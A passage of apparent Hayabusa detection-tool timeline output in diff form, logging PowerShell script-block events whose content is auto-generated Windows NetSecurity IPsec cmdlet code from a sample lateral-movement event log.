$__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Servers')) { [object]$__cmdletization_value = ${Servers} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Servers'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Servers'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Domains')) { [object]$__cmdletization_value = ${Domains} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Domains'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Domains'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EndpointType')) { [object]$__cmdletization_value = ${EndpointType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EndpointType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EndpointType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AddressType')) { [object]$__cmdletization_value = ${AddressType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AddressType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.AddressVersion'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AddressType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.AddressVersion'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Output'",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.081 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Servers')) { [object]$__cmdletization_value = ${Servers} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Servers'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Servers'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Domains')) { [object]$__cmdletization_value = ${Domains} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Domains'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Domains'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EndpointType')) { [object]$__cmdletization_value = ${EndpointType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EndpointType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EndpointType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EndpointType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AddressType')) { [object]$__cmdletization_value = ${AddressType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AddressType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.AddressVersion'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AddressType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.AddressVersion'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Output'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.081 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DnsServers')) { [object]$__cmdletization_value = ${DnsServers} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DnsServers'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DnsServers'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('SyncPolicyDelta', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $false if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Sync-NetIPsecRule' -Alias '*' function Update-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance[]])] param( [Parameter(ParameterSetName='Query (cdxml)', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, 